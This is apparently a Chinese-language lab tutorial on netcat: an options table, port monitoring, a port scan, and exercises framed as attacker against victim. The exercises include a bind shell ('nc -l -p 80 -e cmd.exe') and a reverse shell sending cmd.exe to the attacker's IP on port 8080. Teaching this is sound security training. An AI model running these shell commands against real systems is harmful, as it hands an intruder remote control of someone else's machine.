NC是netcat的缩写被誉为网络安全界的‘瑞士军刀’通过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立起需要的几乎所有类型的网络连接
nc [-options] hostname port[s] [ports] …
序号 | 代码 | 作用 |
---|---|---|
01 | -d | 在后台运行 |
02 | -e prog | 程序重定向,一旦连接,就执行绑定的程序(比较危险) |
03 | -g | 源路由跳跃点,不超过八次 |
04 | -G | 源路由指示器4,8,12,… |
05 | -h | 帮助信息 |
06 | -i secs | 延迟时间设置,端口扫描时使用 |
07 | -l | 监听方式,等待连入。连接完成后,结束监听 |
08 | -L | 监听方式,等待连入。连接完成后,继续监听 |
09 | -n | 以数字形式表示的IP地址 |
10 | -o file | 指定要传送的16进制代码 |
11 | -P port | 指定本地的端口号 |
12 | -r | 随意指定本地0或远程端口号 |
13 | -s addr | 本地的源地址 |
14 | -t | 以telnet形式应答入站请求 |
15 | -u | UDP方式 |
16 | -v | 显示详细信息 |
17 | -w | 指定超时的时间 |
18 | -z | I/O模式,扫描时使用 |
如:
1.应用了http/1.1 应用了GET方法
- 将nc命令复制到c盘根下
- 进入dos模式并退到根下
- 打入nc -l -p 80:监控80端口的进入情况
- 输入本机的IP地址或127.0.0.1使用80端口
2.连接80端口
- 进入dos并退入跟下
- 打上nc -l -p 80:监控80端口的进入情况
- 再开启一个dos telnet本机ip 80或127.0.0.1 80查看联动
3.扫描远程主机192.168.0.103的80到445所有端口
的开放情况
格式:nc -nvv -w2 -z 192.168.0.103 80-445
4. 正向连接:攻击机192.168.0.100,被攻击机192.168.0.103
任务:通过80端口将攻击机192.168.0.100正向连接到被攻击机192.168.0.103上,并对被攻击机的C盘实时操作。
步骤1 被攻击机192.168.0.103上绑定shell到80端口。
格式:nc -vv –l –p 80 –e cmd.exe
步骤2 攻击机192.168.0.100通过80端口连接到主机192.168.0.103并获得远程主机的shell。
格式:nc 192.168.0.103 80
实训5反向连接:攻击机192.168.0.100,被攻击机192.168.0.103
任务:通过8080端口从攻击机192.168.0.100上反向连接到被攻击机192.168.0.103上,并对被攻击机的C盘实时操作。
步骤1 攻击机192.168.0.100对自己的8080端口进行监控。
格式:nc -vv –l –p 8080
步骤2 被攻击机192.168.0.103将shell绑定到攻击机的8080端口,从而攻击机反向获得被攻击机的shell。
格式:nc –e cmd.exe 192.168.0.100 8080